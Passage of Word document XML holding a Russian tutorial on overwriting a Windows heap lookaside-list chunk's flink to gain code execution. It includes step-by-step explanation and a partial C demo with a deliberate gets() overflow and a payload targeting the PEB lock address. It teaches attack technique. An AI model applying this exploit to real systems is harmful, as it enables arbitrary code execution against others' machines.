      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>лубокий вдох...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Начинаем с аллокации чанка A в текущем сегменте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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143500" cy="15525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143500" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Аллоцируем еще один чанк B там же.</w:t>
      </w:r>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057775" cy="15716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057775" cy="1571625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Теперь освобождаем чанк B, он отправляется в список lookaside. С этого момента у нас есть два чанка: один в сегменте, другой в lookaside.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="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086350" cy="306705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086350" cy="3067050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Переполняем чанк А (впоследствии его содержимое попадёт в B, обновив flink). Это метаданные, которые будут перезаписаны.</w:t>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05425" cy="368617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305425" cy="3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Аллоцируем чанк B снова (просим чанк такого же размера, как в шаге 2). Нам вернётся указатель на B, а менеджер кучи обновит данные сегмента для подготовки к следующей аллокации. flink чанка B теперь указывает на произвольный адрес, который контролируется атакующим.</w:t>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172075" cy="334327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172075" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">6. Наконец, получаем управление, аллоцируя чанк C. Он будет слудующим доступным после B, а значит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>расположен там</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, куда указывает flink чанка B. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>В этом месте</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> атакующий записывает в C шеллкод.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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172075" cy="204787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172075" cy="2047875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>По окончанию этого процесса у нас будет контроль над указателем на функцию, которая в идеале будет вызвана после нашей "перезаписи четвёрки". Ниже приведён C код для демонстрации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Overwriting a chunk on the lookaside example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int main(int argc,char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>char *a,*b,*c;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>long *hHeap;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>char buf[10];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("----------------------------\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("Overwrite a chunk on the lookaside\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("Heap demonstration\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("----------------------------\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// create the heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hHeap = HeapCreate(0x00040000,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("\n(+) Creating a heap at: 0x00%xh\n",hHeap);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Allocating chunk A\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// allocate the first chunk of size N (&lt;0x3F8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Allocating chunk B\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// allocate the second chunk of size N (&lt;0x3F8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Chunk A=0x00%x\n(+) Chunk B=0x00%x\n",a,b);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Freeing chunk B to the lookaside\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// Freeing of chunk B: the chunk gets referenced to the lookaside list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HeapFree(hHeap,0,b);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// set software bp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>__asm__("int $0x3");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Now overflow chunk A:\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// The overflow occurs in chunk A: we can manipulate chunk B's Flink</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// PEB lock routine for testing purposes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// 16 bytes for size, 8 bytes for header and 4 bytes for the flink</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x20\xf0\xfd\x7f");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBBDDDD");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gets(a);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// set software bp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>__asm__("int $0x3");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Allocating chunk B\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// A chunk of block size N is allocated (C). Our fake pointer is returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// from the lookaside list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
